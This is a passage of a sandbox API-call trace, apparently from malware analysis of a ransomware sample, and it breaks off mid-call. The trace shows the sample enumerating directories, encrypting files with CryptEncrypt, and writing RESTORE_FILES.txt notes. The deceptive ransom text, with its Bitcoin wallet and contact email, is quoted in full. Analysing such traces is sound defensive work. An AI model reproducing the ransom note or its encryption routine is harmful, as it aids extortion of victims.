lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.948] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.948] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.948] CloseHandle (hObject=0xd4) returned 1 [0065.948] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0065.949] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0065.949] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 89 [0065.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.949] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\.") returned 89 [0065.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.949] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\..") returned 90 [0065.949] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.950] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0065.950] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0065.950] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0065.950] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.950] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0065.950] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0065.950] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0065.950] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0065.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.951] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Windows") returned -1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files (x86)") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="$Recycle.bin") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="System Volume Information") returned 1 [0065.951] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0065.951] StrStrIW (lpFirst="watermark.png", lpSrch=".protected") returned 0x0 [0065.951] lstrcmpW (lpString1="watermark.png", lpString2="RESTORE_FILES.txt") returned 1 [0065.951] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.951] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.951] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.951] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.951] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 105 [0065.958] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.963] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.963] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.965] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.965] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.965] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.965] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.965] CloseHandle (hObject=0xd4) returned 1 [0065.965] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.965] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.965] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 66 [0065.965] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.974] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.974] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.975] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.975] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.975] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.975] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.975] CloseHandle (hObject=0xb4) returned 1 [0065.975] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Windows") returned -1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Program Files") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Program Files (x86)") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="$Recycle.bin") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="System Volume Information") returned 1 [0065.975] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0065.975] lstrcmpW (lpString1="Task", lpString2=".") returned 1 [0065.975] lstrcmpW (lpString1="Task", lpString2="..") returned 1 [0065.975] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned 48 [0065.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.975] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.975] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\.") returned 48 [0065.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.976] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\..") returned 49 [0065.976] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.976] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Windows") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0065.976] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0065.976] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0065.976] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 87 [0065.976] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\.") returned 87 [0066.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.003] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\..") returned 88 [0066.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.003] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0066.003] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0066.003] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0066.003] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 93 [0066.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0066.004] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\.") returned 93 [0066.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.004] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\..") returned 94 [0066.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.004] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0066.004] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.004] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0066.004] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 